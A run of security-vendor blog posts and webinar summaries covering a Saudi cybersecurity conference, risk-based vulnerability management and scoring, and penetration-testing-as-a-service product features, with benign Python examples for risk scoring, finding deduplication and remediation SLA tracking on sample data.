Post title: Navigating the Complexities of Spring4Shell [CVE-2022-22965]
Source: https://www.netspi.com/?p=27620 (last modified 2023-06-12)

Next post, published 2021-12-07:

Shortly after Thanksgiving, we packed our bags and ventured off to Riyadh, Saudi Arabia for the inaugural @Hack cybersecurity event. We were invited to exhibit at the SecureLink booth, who we recently partnered with to expand NetSPI’s services to the Middle East and Africa (MEA).

Over the past two years, the Kingdom of Saudi Arabia has gone through accelerated digital transformation, driven heavily by its Vision 2030 reform plan. And with this digital transformation, comes expanded attack surfaces and more exposure to cyber threats. This was a key theme and concern during the event – and a large part of why the event was organized in the first place.

It was exciting to see the energy and enthusiasm around technology and cybersecurity (almost as exciting as when we realized that @Hack was synonymous with “attack”). @Hack organizers estimated that more than 14,000 people from 70 countries were in attendance, many of whom we spoke to at the NetSPI stand about the state of security in Saudi Arabia, penetration testing, cybersecurity education, cybersecurity jobs, and more.

As we packed up to head to our next destinations, we took time to reflect on our conversations, the people we met, and the key themes we observed on the show floor.

Cybersecurity Maturity in the Kingdom of Saudi Arabia

The Kingdom of Saudi Arabia has only recently focused on transforming their technological infrastructure and has invested in becoming a technological powerhouse in the region. At the conference itself, we saw the use of QR codes, mobile payments, digital sharing of contact information, and more. Although their technology adoption is very high, there is an opportunity for the region to mature its understanding of and focus on cybersecurity challenges.

One of the younger attendees came from Egypt and participated in the “bug bounty” challenge. He came in 2nd place and mentioned how the challenge to him was simple compared to what he was used to in his home country. To us, this indicates that security is not necessarily at the forefront of Saudi Arabia’s considerations when acquiring or deploying technology, and there is some catching up it needs to do to ensure security keeps pace with its technological developments.

We also recognized that most of the cybersecurity work performed is based on what is mandated by the Kingdom of Saudi Arabia government. Penetration testing services are not a large part of that discussion today, but we anticipate security testing activities – pentesting, secure code review, threat modeling, red team, design reviews – will be part of the requirements very soon.

The State of Penetration Testing

At the event, we were surprised to hear that the concept of penetration testing is new to most people and organizations in the region. In many of our conversations, we heard that they were interested in purchasing products and software solutions that could take care of all security concerns. But, as we know, even the largest technology companies can make security mistakes (see: Microsoft Azure CVE-2021-4306).

There were a number of misconceptions about penetration testing that we helped to address at the show. Notably, the difference between penetration testing and simply running an automated scanner tool or a monitoring solution.

The explosion in technology adoption over the last few years has caused many companies to rapidly seek new and innovative security solutions, however, the adoption of pentesting services in the Middle East will be largely driven by regulation.

Youth and Women in Cybersecurity

@Hack brought a diverse group of people together. Students as young as 11 stopped by our booth and were eager to learn from us. It was incredible to see the younger generation’s interest in cybersecurity careers and education. Questions we were asked include, “how can we learn more?”, “where can I find more resources?”, “what resources should I look at to become a pentester?”, and “can you hire me and train me?”

A large portion of those coming into the industry are students who have learned from global online communities, including bug bounties, capture the flag, and online forums. For continued reading, this Arab News article highlights some of the young attendees involved at the event.

Across the globe, there are initiatives to get women more involved in cybersecurity. Cybersecurity Ventures and WiCys predict that women will hold 25 percent of cybersecurity jobs globally by the end of 2021, up from 20 percent in 2019. This was evident at @Hack.

Women were equally, if not more, involved at the conference than their male counterparts in terms of communication, interest, types of questions they were asking, etc. The transition to more progressive ideologies in the region has clearly resulted in a large influx of highly educated and motivated women wanting to break into the space.

Overall, the event was a great opportunity to connect and share information with security peers across the globe and we hope they will put on @Hack next year. With our new SecureLink partnership, we’re excited to continue educating the region on the benefits of penetration testing and the value it brings when done well. Want to connect with us at the next big cybersecurity event? We’re heading to RSA Conference in San Francisco, February 7-10, 2022. Schedule a meeting with us!

Explore our penetration testing, adversary simulation, and attack surface management services.
Post title: @Hack: Cybersecurity Transformation in Saudi Arabia
Source: https://www.netspi.com/?p=26810 (last modified 2023-01-23)

Next post, published 2021-08-10:

Gartner anticipates that, by 2022, organizations that use a risk-based vulnerability management process will experience 80% fewer breaches. So, how can an organization make this shift and achieve a risk-based vulnerability management program? Two words: Risk scoring.

Leveraging risk scores for remediation prioritization and quantifying risk allows companies to prioritize budgets and resource allocation and focus on the security activities that could have the greatest impact to their business. And the idea of incorporating risk scoring intelligence to make the shift to a risk-based vulnerability management program is evolving. 

Through the collaboration of NetSPI’s development, engineering, and product teams, we’ve uncovered an accurate, data-driven methodology to calculate both aggregate and vulnerability risk scores using the data available from our penetration testing and vulnerability management platform, Resolve™. Let’s dig deeper.

What is risk scoring? 

In its most abstract form, risk is “the effect of uncertainty on objects involving exposure to danger.” At its foundation, cyber security risk is ultimately a function of (threat x vulnerability). While the definitions are helpful, it is important to look at your security program with a new lens and assess how your organization quantifies its risk – and is it even important to do so? Simply, the answer is yes. Quantifying and measuring cybersecurity risk is one of the most important components to a successful risk-based vulnerability management program.

The evolution of risk-based vulnerability management

Vulnerability incident resolution used to be reactive. Companies would wait for something to be exploited, then fix it. As IT systems became more integral to business operations, the need to be proactive in cyber defense became evident. Many tools have been developed that can hastily provide a list of vulnerabilities, but companies were quickly overwhelmed and overloaded with the number of identified vulnerabilities without direction or priority assigned for remediation. 

The introduction of Governance, Risk, and Compliance (GRC) software that could correlate all vulnerabilities aligned to business controls and identify the “true risks” to the company allowed some prioritization of risk. This management activity was done through technology in a system without human touch, lacking real world controls and exceptions. This caused the technologies to be complicated, difficult to implement, and require extensive customization. The latest vulnerability management market entrants are touting their ability to utilize AI to try and predict an exploit before it ever happens. But organizations are spending a lot of money on this technology, and it’s hard to predict. The usage of AI and other automated tools opaquely calculates the likelihood of a vulnerability exploit and offers limited customization to the companies using the technology. 

Today, the gold standard is a risk-based vulnerability management program. One where we prioritize vulnerability remediation efforts based on the true risk it presents to your specific organization, as opposed to a program that focuses purely on compliance "check the box" activities or a program that is so overwhelmed it remediates vulnerabilities ad-hoc as they show up, as opposed to appropriately prioritizing them.

For more insights, watch our webinar: The Evolution of Risk-Based Vulnerability Management.

How to use your risk score metrics to help find, prioritize, and fix vulnerabilities

Risk scoring allows companies to manage their evolving attack surface in ways they could not before. The first step is to develop a customized risk lifecycle that will be the foundation on which risk data is generated. This includes identifying both the external and internal threats and vulnerabilities, as well as the assets that could be attacked. The decision then must be made on the best course of treatment, with options including mitigating, transferring, or accepting the risk.

Here are the seven factors that impact how risk scores are determined in our Resolve™ platform:

  • Impact – If this vulnerability were to be exploited, how severe would its impact be? 
  • Likelihood – How likely is it that an attacker can and will attack this space? 
  • Environmental Modifiers – Think broadly about the asset and the environment in which the vulnerability is located.
  • Temporal Modifiers – Focuses on exploit code maturity, confidence, and remediation requirements. Temporal modifiers bring your risk score to life.
  • Industry Comparisons – How does your risk compare to other organizations or peers in your sector? 
  • Threat Actors – Are threat actors actively exploiting vulnerabilities present in your environment? 
  • Remediation Risk – Using the remediation SLAs available through PTaaS, all vulnerabilities are automatically assigned customizable due dates. Use remediation risk to determine your aggregates that require attention from a compliance perspective.

Vulnerability risk scoring is particularly beneficial for remediation prioritization, since priority is calculated by weighing (vulnerability risk x the cost of resolution). If a vulnerability is deemed high severity but its impact on your business would be low if exploited, the risk score would be on the lower side, and it may not be worth spending the money to fix it. And vice versa.
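As an added example with an assumed scoring scheme (the post lists Resolve’s seven factors but not how it weights them, so this is not the platform’s formula), the Python below encodes the factors as fields on a constructed finding, derives a composite risk score, ranks findings by risk per unit of remediation cost, and flags findings past their SLA due date. The findings, every factor value, the 1.5x active-exploitation multiplier and the “today” date are all constructed for illustration; industry comparison is left out because it needs peer data the example does not have. The point it demonstrates is the one above: a 9.8-severity finding on an isolated box ranks below a medium-severity finding on a customer-facing system that is being actively exploited.

```python
from dataclasses import dataclass
from datetime import date


@dataclass
class Finding:
    name: str
    severity: float            # scanner or CVSS-style severity, 0-10
    impact: float              # business impact if exploited, 0-1
    likelihood: float          # chance an attacker can and will reach it, 0-1
    exploit_maturity: float    # temporal modifier: 1.0 weaponised ... 0.5 theoretical (assumed scale)
    env_modifier: float        # environmental modifier: 1.0 internet-facing ... 0.5 isolated (assumed scale)
    actively_exploited: bool   # threat-actor signal
    cost_to_fix: float         # relative remediation effort, 1.0 = routine change
    due: date                  # remediation SLA due date


def risk_score(f):
    """Assumed composite score, 0-10: severity x impact x likelihood, then
    adjusted by the temporal, environmental and threat-actor factors."""
    score = f.severity * f.impact * f.likelihood
    score *= f.exploit_maturity * f.env_modifier
    if f.actively_exploited:
        score *= 1.5
    return round(min(score, 10.0), 2)


def remediation_priority(f):
    """Risk per unit of remediation cost; higher means fix sooner."""
    return round(risk_score(f) / f.cost_to_fix, 2)


def prioritise(findings, today):
    """Findings ordered by priority, each with its score and SLA status (remediation risk)."""
    rows = [
        {
            "name": f.name,
            "severity": f.severity,
            "risk": risk_score(f),
            "priority": remediation_priority(f),
            "overdue": f.due < today,
        }
        for f in findings
    ]
    return sorted(rows, key=lambda r: r["priority"], reverse=True)


# Constructed findings; the factor values are illustrative assumptions.
FINDINGS = [
    Finding("SQL injection in payments portal", 6.5, 0.9, 0.8, 1.0, 1.0, True, 2.0, date(2021, 8, 1)),
    Finding("RCE in isolated lab server", 9.8, 0.2, 0.3, 0.9, 0.5, False, 1.0, date(2021, 9, 30)),
    Finding("Missing HSTS on marketing site", 3.7, 0.3, 0.4, 0.7, 1.0, False, 0.5, date(2021, 12, 31)),
]

# Evaluation date for the SLA check; the post's publication date, chosen arbitrarily.
TODAY = date(2021, 8, 10)

if __name__ == "__main__":
    for row in prioritise(FINDINGS, TODAY):
        print(row)
```

Whatever weights an organisation settles on, keeping them explicit in code like this is what makes a score defensible: the ranking can be explained factor by factor, and a change in one input (an exploit going public, a host moving behind a VPN) shows up as a traceable change in priority.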

When it comes time to put your risk score to use, here are a few remediation considerations to keep in mind:

  • Prioritize – Prioritization is the most difficult part. Companies today can effectively identify vulnerabilities through penetration testing services, but how do they figure out which ones to fix first? What are the true risks to the business? This will vary depending on your business. 
  • Evaluate – Organizations must understand the efficacy of their risk mitigating controls. Manual pentesting and vulnerability scans still need to be done to validate your efforts are working as intended. 
  • Utilize the Data – Once you have a risk score, use it to validate and drive decisions around resource allocation, remediation prioritization, spend validation, track risk over time, industry benchmarking, and more.
  • Effectiveness – Are you on track to remediate your vulnerabilities before any threat materializes? Are your vulnerability and aggregate risk scores improving over time?

We see it every day. Companies are facing an immense number of vulnerabilities that humans have to manually sift through to assess and prioritize. Having a risk-based vulnerability management program in place allows organizations to identify, prioritize and remediate risks within their organization, saving time, headaches, and – perhaps most importantly – dollars in the end. 

Post title: The Secret to a Successful Risk-Based Vulnerability Management Program: Risk Scoring
Source: https://www.netspi.com/?p=26115 (last modified 2022-12-16)

Next post, published 2021-05-13:

Overview  

Over time, the way we view cyber security risk has evolved the penetration testing industry. What once was a static laundry list of vulnerabilities to remediate is now a risk-based vulnerability management program. Modern penetration testing should provide more than a list of vulnerabilities. To be effective, it must guide organizations to effectively prioritize the vulnerabilities, assets, networks, etc. that pose the highest risk to the business. 

In this webinar, NetSPI’s product team, Jake Reynolds and Cody Chamberlain, will discuss how risk has evolved in penetration testing services, the role of risk scoring in intelligent prioritization of security activities, the factors that impact a risk score, and pragmatic steps to take after you receive a risk score.

Key Highlights:

  • 2:18 – What is risk? 
  • 8:07 – Evolution of risk assessment 
  • 12:34 – How risk scores are created 
  • 21:49 – NetSPI’s risk scoring 

What is Risk? 

In its most abstract form, risk is the effect of uncertainty on objectives. From an information security perspective, organizations have traditionally defined risk as threat times vulnerability. The product is zero whenever either factor is zero: if you are vulnerable but no threat is acting against you, there is no risk; conversely, if many threat actors are attacking an organization but it has no vulnerabilities they can exploit, there is also no risk. In practice the assessment step also weighs impact and asset value, so the same vulnerability scores lower on a throwaway test host than on a payment system.  

The risk lifecycle includes:

  • Context to identify risk tolerance, people, and processes 
  • Identification of vulnerabilities, threats, and assets 
  • Assessment, applying the risk = threat × vulnerability formula and weighing likelihood, impact, and asset value 
  • Treatment by mitigating, transferring, or accepting the risk  

Download the whitepaper: How to Use Risk Scoring to Propel Your Risk-Based Vulnerability Management Program Forward

Evolution of Risk Assessment 

The evolution of risk assessment refers to how an organization has dealt with a specific problem or vulnerability in the past. Originally, it may have been as simple as responding to a problem and fixing it. As IT systems became more important and integral to business processes, organizations realized the need to start proactively identifying the vulnerabilities. 

Some steps in the evolution of risk assessment have included:

  • Respond to it and fix it: Wait for a problem or vulnerability to happen and fix it. 
  • Let GRC solve it: Send the risk to a governance, risk, and compliance (GRC) application that correlates all vulnerabilities with controls and identifies the “true risks” to the company. 
  • Find the vulnerabilities: Proactively find vulnerabilities and fix them regardless of compensating controls, threat actor analysis, or asset value – just fix it. 
  • Trust us, it works: Use artificial intelligence (AI) or other tools that calculate the likelihood of a vulnerability being exploited without exposing how the score was derived.   

While risk assessment is now more effective than it was in the past, organizations still face an immense number of vulnerabilities that they have to sift through and prioritize. Risk-based vulnerability management providers are more effectively integrating threat intelligence than in the past. But there’s always an opportunity for more organizations to embrace threat intelligence. 

How to Use Risk Scores 

A lot of information and criteria go into calculating a risk score, and many different equations are in use. Once you have a risk score, the next step is figuring out how to use it. The most useful risk score is a single numeric value you can sort by: the top score is your worst vulnerability, or the asset you most need to focus on and start remediating immediately.  

At NetSPI, we expose the top risk score in a few different ways using our risk scoring methodology, but ultimately, you can simply sort the risk scores, select the top item, and begin remediation.

An effective methodology also splits risk scoring into two distinct categories. One is vulnerability specific risk scoring and the other is aggregate risk scoring, meaning taking a group of vulnerabilities and assigning a score to them. 

Metrics to measure vulnerability risk scoring include:

  • Impact: how detrimental exploitation of the vulnerability would be to the organization, including monetary, brand, and industry-specific impact.  
  • Likelihood: how likely the vulnerability is to be exploited. 
  • Environmental factors: whether compensating controls exist in the environment, whether public exploit code is available, and whether the affected asset has access to PII or PHI. 

Aggregate risk scoring factors include:

  • Vulnerability intelligence: How does this specific combination of vulnerabilities affect your business?  
  • Industry comparisons: How does your risk compare to other organizations in your sector?  
  • Threat actors: Are threat actors actively exploiting vulnerabilities present in your environment?  
  • Remediation effectiveness: Are you on track to remediate your risks on time?  
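As an added illustration of the two-level model described above (this is not NetSPI’s scoring formula, which the webinar does not publish), the following Python computes a vulnerability-specific score from impact, likelihood, and environmental modifiers, then an aggregate score per asset, and sorts both so that the top item is the one to fix first. The 1–5 scales, the multiplier values, the aggregation rule, and the sample findings are all assumptions made for the example.

```python
from __future__ import annotations

from dataclasses import dataclass


@dataclass
class Finding:
    name: str
    asset: str
    impact: int              # 1 (negligible) .. 5 (business-ending); assumed scale
    likelihood: int          # 1 (theoretical) .. 5 (trivially exploitable); assumed scale
    public_exploit: bool = False        # public exploit code is available
    compensating_control: bool = False  # e.g. WAF, segmentation, MFA in front of it
    touches_pii_or_phi: bool = False    # asset holds regulated personal/health data


def vulnerability_score(f: Finding) -> float:
    """Vulnerability-specific score on a 0-100 scale.

    Base = impact x likelihood (1..25) rescaled to 100; environmental
    factors then scale it up or down. The multipliers are assumed values
    chosen so that no single factor can dominate the base score.
    """
    base = f.impact * f.likelihood / 25 * 100
    modifier = 1.0
    if f.public_exploit:
        modifier *= 1.25
    if f.compensating_control:
        modifier *= 0.6
    if f.touches_pii_or_phi:
        modifier *= 1.2
    return round(min(100.0, base * modifier), 1)


def aggregate_score(findings: list[Finding]) -> float:
    """Aggregate score for a group of findings, e.g. everything on one asset.

    The worst finding counts at full weight and each further finding at half
    the previous weight, capped at 100, so a pile of lows never outranks one
    critical and fixing the top item moves the asset score the most.
    """
    scores = sorted((vulnerability_score(f) for f in findings), reverse=True)
    total, weight = 0.0, 1.0
    for s in scores:
        total += s * weight
        weight /= 2
    return round(min(100.0, total), 1)


def rank_findings(findings: list[Finding]) -> list[tuple[float, Finding]]:
    """Findings sorted worst-first: the first entry is what to fix now."""
    return sorted(((vulnerability_score(f), f) for f in findings),
                  key=lambda pair: pair[0], reverse=True)


def rank_assets(findings: list[Finding]) -> list[tuple[str, float]]:
    """Group findings by asset and return assets sorted worst-first."""
    by_asset: dict[str, list[Finding]] = {}
    for f in findings:
        by_asset.setdefault(f.asset, []).append(f)
    ranked = [(asset, aggregate_score(fs)) for asset, fs in by_asset.items()]
    return sorted(ranked, key=lambda pair: pair[1], reverse=True)


# Constructed sample findings for the example (not real engagement data).
SAMPLE = [
    Finding("SQL injection in /login", "app.example.com", 5, 4,
            public_exploit=True, touches_pii_or_phi=True),
    Finding("Missing HSTS header", "app.example.com", 1, 2),
    Finding("Outdated TLS (1.0 enabled)", "vpn.example.com", 3, 3,
            compensating_control=True),
    Finding("Default credentials on admin UI", "printer.example.com", 3, 5),
    Finding("Verbose error page", "printer.example.com", 1, 1),
]

if __name__ == "__main__":
    print("Vulnerabilities, worst first:")
    for score, f in rank_findings(SAMPLE):
        print(f"  {score:5.1f}  {f.asset:22} {f.name}")
    print("Assets, worst first:")
    for asset, score in rank_assets(SAMPLE):
        print(f"  {score:5.1f}  {asset}")
```

The point of keeping the environmental factors as explicit multipliers is the transparency the webinar asks for: anyone reading a score can see which factor moved it, instead of trusting an opaque model.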

NetSPI’s Risk Scoring  

NetSPI’s risk-based vulnerability management capabilities and risk scoring model focus on transparency and collaboration with our clients. Our risk scoring brings together the different aspects of risk into our platform to align with the penetration testing as a service (PTaaS) experience. Clients will not only understand how their risk scores are impacted, but they will also be able to track risk scores over time at the granular vulnerability level, the project level, and the greater organizational level. 

Other capabilities include:

  • Customization options 
  • Scalable risk scores 
  • Benchmarking against peers 
  • High-touch, high-tech through a combination of advanced technology and human expertise 

Learn more about NetSPI’s risk score methodology and how to effectively propel your risk-based vulnerability management program forward by reading this whitepaper.

Video: https://youtu.be/0NipyMx2Rxs

(Webinar title: The Evolution of Risk-Based Vulnerability Management. Last modified 2023-08-22.)

* * *

Post, published 2020-12-08

PTaaS Pro is now offered as part of AppSec as a Service. Learn more about AppSec as a Service.

During our penetration testing engagements, we frequently hear from clients that it is difficult to manage the large volume of vulnerabilities we discover. While on the one hand, this is what we are hired to do, for our clients, it poses some challenges. Now, with Penetration Testing as a Service (PTaaS) we’ve made it easier than ever to consume, understand, and manage the large number of results we deliver to our clients with our penetration tests. And with PTaaS+, we’ve extended those benefits by directly integrating with your ticketing systems and allowing you to perform the full remediation lifecycle inside of Resolve™, our threat and vulnerability management platform.

What are you supposed to do when NetSPI isn’t the only source of vulnerability discovery for your organization? It is extremely important to correlate and deduplicate vulnerabilities from all your data sources, not only to reduce noise but to spare your engineering teams the frustration of duplicates and false positives, and to provide consistent, up-to-date guidance.

PTaaS Pro solves this problem by providing Resolve’s full suite of Threat and Vulnerability Management capabilities to our penetration testing clients. PTaaS Pro is an extremely valuable tool for security programs of all sizes, and provides many benefits, including:

Manage Internal and Third-Party Vulnerabilities

PTaaS Pro gives you the ability to manage all your organization’s vulnerabilities, not just those that NetSPI discovers. Yes, that even means vulnerabilities discovered by our competition. Resolve can integrate with over 30 vulnerability scanners, your CMDBs, and your internal ticketing systems to provide a consolidated warehouse for all vulnerabilities.
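The correlation step that the two paragraphs above call for, as an added example that is not Resolve’s code: it normalizes findings exported from several sources onto a shared key (asset, port, vulnerability identifier), merges duplicates while keeping every contributing source and every unique location, and drops keys the team has already triaged as false positives. The export format, the normalization rules, and the sample rows are assumptions made for the example.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}", re.IGNORECASE)
# Decorations scanners append to titles; assumed patterns for the example.
NOISE_RE = re.compile(r"\s*\((?:critical|high|medium|low|info|plugin \d+)\)")


def normalize_asset(raw: str) -> str:
    """Collapse 'https://App.Example.com:443/login' and 'app.example.com'
    onto one hostname so findings from different tools line up."""
    host = re.sub(r"^[a-z]+://", "", raw.strip().lower())
    return host.split("/")[0].split(":")[0]


def vuln_key(raw_title: str) -> str:
    """Prefer a CVE id when the title carries one; otherwise use the title
    with severity tags and punctuation stripped."""
    m = CVE_RE.search(raw_title)
    if m:
        return m.group(0).upper()
    title = NOISE_RE.sub("", raw_title.lower())
    return re.sub(r"[^a-z0-9]+", " ", title).strip()


@dataclass
class Correlated:
    asset: str
    port: int | None
    vuln: str
    sources: set[str] = field(default_factory=set)
    instances: set[str] = field(default_factory=set)  # unique locations
    titles: set[str] = field(default_factory=set)     # original wording, kept for audit


def correlate(raw_findings: list[dict], false_positives: set[tuple]) -> list[Correlated]:
    """Merge raw rows sharing (asset, port, vuln) into one record each and
    drop keys already triaged as false positives, so the engineering team
    sees one ticket per real issue instead of one per tool."""
    merged: dict[tuple, Correlated] = {}
    for row in raw_findings:
        key = (normalize_asset(row["asset"]), row.get("port"), vuln_key(row["title"]))
        if key in false_positives:
            continue
        rec = merged.setdefault(key, Correlated(*key))
        rec.sources.add(row["source"])
        rec.instances.add(row.get("location") or "")
        rec.titles.add(row["title"])
    return sorted(merged.values(), key=lambda r: (r.asset, r.port or 0, r.vuln))


# Constructed sample exports from a manual test and two scanners (not real data).
RAW = [
    {"source": "netspi", "asset": "https://App.Example.com/login", "port": 443,
     "title": "SQL Injection", "location": "/login?user="},
    {"source": "scanner-a", "asset": "app.example.com", "port": 443,
     "title": "SQL Injection (High)", "location": "/login?user="},
    {"source": "scanner-a", "asset": "app.example.com", "port": 443,
     "title": "SQL Injection (High)", "location": "/search?q="},
    {"source": "scanner-b", "asset": "app.example.com", "port": 443,
     "title": "OpenSSL Padding Oracle (CVE-2016-2107)", "location": ""},
    {"source": "scanner-a", "asset": "app.example.com", "port": 443,
     "title": "cve-2016-2107 openssl vulnerability", "location": ""},
    {"source": "scanner-b", "asset": "vpn.example.com", "port": 443,
     "title": "SSL Certificate Cannot Be Trusted", "location": ""},
]

# Keys the team has already triaged as false positives (here: an internal CA).
FALSE_POSITIVES = {("vpn.example.com", 443, "ssl certificate cannot be trusted")}

if __name__ == "__main__":
    records = correlate(RAW, FALSE_POSITIVES)
    print(f"{len(RAW)} raw rows -> {len(records)} correlated findings")
    for r in records:
        print(f"{r.asset}:{r.port} {r.vuln} sources={sorted(r.sources)} "
              f"instances={len(r.instances)}")
```

Keeping the original titles on each merged record matters for audit: when a developer asks why two scanners disagree on wording, the answer is in the record rather than lost in the merge.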

Reduce In-house Penetration Testing Times by up to 30 Percent

Resolve is a powerful tool for internal penetration testing teams, allowing them to coordinate project management for tests, standardize and enforce processes through checklists, correlate and deduplicate their automated and manual findings, and generate reports with the click of a button. One of the reasons NetSPI performs the highest quality penetration testing in the industry is because Resolve removes the hassle from testing, allowing your team to focus on finding vulnerabilities.

We’re More Than a Vendor – We’re Your Partner

When launching PTaaS Pro with your organization, NetSPI connects you with our team of industry experts, including former CISOs, vulnerability managers, and security experts. Together we work to integrate Resolve and NetSPI into your security processes. Every step of the way you’ll have access to first-hand experience and guidance on how to optimize and improve your security program.


(Post title: Introducing PTaaS Pro: The Smart Solution to Penetration Testing and Vulnerability Management. Last modified 2021-05-25.)

* * *

Post, published 2020-10-22

The PTaaS+ features listed within this blog post are now offered with any NetSPI service that leverages PTaaS. This excludes ticketing integrations, which are available for an additional cost. Contact us to learn more.

NetSPI is focused on creating the next generation of security testing. Our Penetration Testing as a Service (PTaaS) delivers higher-quality vulnerability findings in less time than any other provider, and we are now extending these benefits into your remediation lifecycle.

This month we’re expanding your options with our PTaaS+ plan, which focuses on vulnerability management and remediation. With our base PTaaS plan, we deliver vulnerabilities the same day they are found; with PTaaS+, you and your team are empowered to act on them and begin remediation immediately, decreasing your time to remediation by up to one month for high-severity issues. A couple of key features contribute to this new functionality:

Ticketing Integrations

On average, we report over 50 vulnerabilities on a typical web application test, and that number jumps above 700 when we perform external network testing. When you receive that many vulnerabilities, making sense of them all can be a full-time job before you even get to remediating them. With PTaaS+, we offer free integration with Jira or ServiceNow to get the vulnerabilities into your tools and into the remediator’s hands on day zero.

Remediation Assignments & SLAs

After receiving a large number of vulnerabilities, the first step is assigning a due date for remediation based on vulnerability severity. PTaaS+ allows each severity to be assigned a timeframe, counted from the delivery date, within which it must be remediated. NetSPI’s standard recommendation is:

  • Critical – 30 days
  • High – 60 days
  • Medium – 90 days
  • Low – 365 days

However, these can be customized to fit your organization’s policies. Additionally, with PTaaS+, you can assign vulnerabilities to specific users, letting you track and delegate vulnerabilities throughout the remediation lifecycle.

Vulnerability Customization

After delivering vulnerabilities, one common point of discussion is NetSPI’s severity rating versus an organization’s internal vulnerability rating. Every organization rates vulnerabilities differently, so PTaaS+ allows you to assign your own severity to any vulnerability, from which your remediation due dates are then calculated. Both NetSPI’s severity and yours are maintained for auditing and future reporting.
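An added example of the SLA and severity-override logic described in the two sections above (this is not PTaaS+ code). It uses the recommended SLA table from the post; the rule that an organization-assigned severity takes precedence when present, the status names, the assignee grouping, and the sample findings are assumptions made for the example.

```python
from __future__ import annotations

from dataclasses import dataclass
from datetime import date, timedelta

# Recommended defaults from the post; an organization can pass its own table.
DEFAULT_SLA_DAYS = {"Critical": 30, "High": 60, "Medium": 90, "Low": 365}


@dataclass
class Finding:
    title: str
    delivered: date                   # the day the finding was delivered
    tester_severity: str              # severity assigned by the pentest team
    org_severity: str | None = None   # organization's own rating, if assigned
    remediated: date | None = None
    assignee: str | None = None


def effective_severity(f: Finding) -> str:
    """The organization's rating drives the SLA when one was assigned; the
    tester's rating stays on the record for audit (assumed precedence rule)."""
    return f.org_severity or f.tester_severity


def due_date(f: Finding, sla_days: dict[str, int] = DEFAULT_SLA_DAYS) -> date:
    """Delivery date plus the SLA window for the effective severity."""
    sev = effective_severity(f)
    if sev not in sla_days:
        raise ValueError(f"no SLA configured for severity {sev!r}")
    return f.delivered + timedelta(days=sla_days[sev])


def sla_status(f: Finding, today: date, sla_days: dict[str, int] = DEFAULT_SLA_DAYS) -> str:
    """'met' or 'breached' once remediated; 'open' or 'overdue' while not."""
    due = due_date(f, sla_days)
    if f.remediated is not None:
        return "met" if f.remediated <= due else "breached"
    return "overdue" if today > due else "open"


def overdue_by_assignee(findings: list[Finding], today: date,
                        sla_days: dict[str, int] = DEFAULT_SLA_DAYS) -> dict[str, list[str]]:
    """Group overdue, unremediated findings by owner so each team gets its own list."""
    out: dict[str, list[str]] = {}
    for f in findings:
        if sla_status(f, today, sla_days) == "overdue":
            out.setdefault(f.assignee or "unassigned", []).append(f.title)
    return out


# Constructed sample findings (not real engagement data).
SAMPLE = [
    Finding("SQL injection in /login", date(2020, 10, 22), "Critical", assignee="web-team"),
    Finding("Missing security headers", date(2020, 10, 22), "Medium", org_severity="Low",
            assignee="web-team"),
    Finding("Reflected XSS in /search", date(2020, 10, 22), "High",
            remediated=date(2020, 11, 30), assignee="web-team"),
    Finding("Outdated jQuery", date(2020, 10, 22), "Low", org_severity="High",
            remediated=date(2021, 1, 15), assignee="frontend"),
]
TODAY = date(2021, 2, 1)   # constructed reporting date for the example

if __name__ == "__main__":
    for f in SAMPLE:
        print(f"{f.title:28} tester={f.tester_severity:8} effective={effective_severity(f):8} "
              f"due={due_date(f)} status={sla_status(f, TODAY)}")
    print("overdue:", overdue_by_assignee(SAMPLE, TODAY))
```

Note that a downgrade by the organization (the headers finding, Medium to Low) lengthens the window, and an upgrade (the jQuery finding, Low to High) shortens it enough that a remediation the tester’s rating would have counted as on time is recorded as an SLA breach; both severities are still on the record.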

Data Analytics

After you have a handle on your remediation processes, you can start looking for trends to ensure fewer vulnerabilities next year. PTaaS+ grants you access to NetSPI’s Data Lab, which allows you to analyze and trend vulnerabilities across all your assessments with NetSPI. Popular Data Lab queries include:

  • Riskiest asset in your environment
  • Most common vulnerabilities across your company
  • Top OWASP categories


(Post title: Introducing PTaaS+: Decreasing Your Organization's Time to Remediation. Last modified 2024-01-05.)

* * *

Post, published 2020-10-07

On October 7, NetSPI Managing Director Nabil Hannan and Product Manager Jake Reynolds were featured in Cyber Defense Magazine:

With Continuous Integration/Continuous Deployment (CI/CD) increasingly becoming the backbone of the modern DevOps environment, it's more important than ever for engineering and security teams to detect and address vulnerabilities early in the fast-paced software development life cycle (SDLC). This is particularly true at a time when the rate of deployment of telehealth software is growing exponentially, usage of cloud-based software and solutions is high because of the shift to remote work, contact-tracing software raises privacy and security concerns, and software and applications are used in nearly everything we do. As such, there is an ever-increasing need for organizations to take another look at their application security (AppSec) strategies to ensure applications are not left vulnerable to cyberattacks.

Read the full article for three steps to get started, starting on page 65 of the digital magazine.

(Post title: Cyber Defense Magazine: 3 Steps to Reimagine Your AppSec Program. Last modified 2021-05-04.)

* * *

Webinar, published 2020-09-10

This session was originally shown at Black Hat USA 2020.

Overview 

A successful Application Security Program requires a happy marriage between people, processes, and technology. 

In this on-demand webinar, NetSPI Field CISO Nabil Hannan and Head of Emerging Technology Jake Reynolds explore:  

  • How leading organizations use different discovery techniques as part of their AppSec program 
  • Strengths and weaknesses of common AppSec vulnerability discovery technologies 
  • Techniques that make security frictionless for your developers as they embrace a DevSecOps culture 
  • What a “makeover” can do for your application security program, including how to: 
    • Enhance your reporting to empower leadership to optimize your AppSec program 
    • Improve your vulnerability ingestion, correlation, and enrichment  
    • Increase your speed to remediation 

Key highlights: 

  • 0:35 – Pre-renovation 
  • 1:28 – Application vulnerability discovery techniques  
  • 7:30 – Post-renovation 
  • 10:50 – NetSPI’s platform demo 

Pre-Renovation  

If you’re considering giving your application security program an extreme makeover, you’ll likely notice some telltale signs that your AppSec program is in need of renovation.

Some of those signs include:

  • New and immature AppSec programs are reactive 
  • Security testing is performed ad-hoc 
  • Vulnerabilities and remediation efforts aren’t managed centrally 
  • Organizations face challenges conveying the value of AppSec efforts and investment  

Application Vulnerability Discovery Techniques  

When it comes to application vulnerability discovery techniques, a few traditional techniques are more commonly used while emerging ones are gaining adoption and popularity. Traditional techniques include: 

  • Static application security testing (SAST) and manual code review 
  • Dynamic application security testing (DAST) and manual pentesting 
  • Manual inventory of OSS usage  

Emerging techniques include:  

  • Interactive application security testing (IAST) 
  • Runtime application self-protection (RASP) 
  • Software composition analysis (SCA) 

Common Discovery Tool Types 

As you decide how you want to renovate your AppSec program, there are many different options to consider, including the following:

  • SAST and DAST
    • Challenging to deploy and manage in large organizations 
    • Noisy (high false positive rates out of the box)  
    • Long scan times 
